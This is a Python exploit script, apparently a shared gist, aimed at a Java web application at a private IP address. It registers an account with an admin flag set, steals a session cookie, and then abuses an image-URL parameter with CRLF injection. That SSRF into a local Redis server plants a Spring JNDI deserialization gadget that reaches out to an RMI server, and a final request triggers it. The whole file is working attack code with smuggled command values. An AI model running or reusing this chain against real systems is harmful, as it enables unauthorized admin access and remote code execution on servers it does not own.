import requests | |
def register(url): | |
reg_url = url + '/doregister.do' | |
post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'} | |
resp = requests.post(url=reg_url,data=post_data) | |
def login(url): | |
req = requests.Session() | |
login_url = url + '/login.do' | |
post_data = {'username':'admin','password':'admin123'} | |
response = req.post(url=login_url,data=post_data,allow_redirects=False) | |
cookie_value = response.headers['Set-Cookie'] | |
last_cookie = cookie_value.split(';')[0].split('=')[1] | |
return last_cookie | |
def exploit(url,cookie_value): | |
headers = {'Cookie':'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)} | |
step1 = {"url":"http://127.0.0.1\r\n\r\nset post27 \"\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi\"\r\n\r\n:6379/1.jpg"} | |
step2 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0\r\n\r\n:6379/1.jpg"} | |
step3 = {"url":"http://127.0.0.1\r\n\r\nappend post27 rmiserver\r\n\r\n:6379/1.jpg"} | |
step4 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x2f))\" 0\r\n\r\n:6379/1.jpg"} | |
step5 = {"url":"http://127.0.0.1\r\n\r\nappend post27 \"Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n\"\r\n\r\n:6379/1.jpg"} | |
steplist = [step1,step2,step3,step4,step5] | |
for step in steplist: | |
exploit_url = url + '/user/headimg.do' | |
resp = requests.get(url=exploit_url,headers=headers,params=step) | |
resp = requests.get(url=url+'/manage/check.do?pid=27',headers=headers) | |
if __name__ == '__main__': | |
url = 'http://192.168.201.25' | |
register(url) | |
cookie=login(url) | |
exploit(url,cookie) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment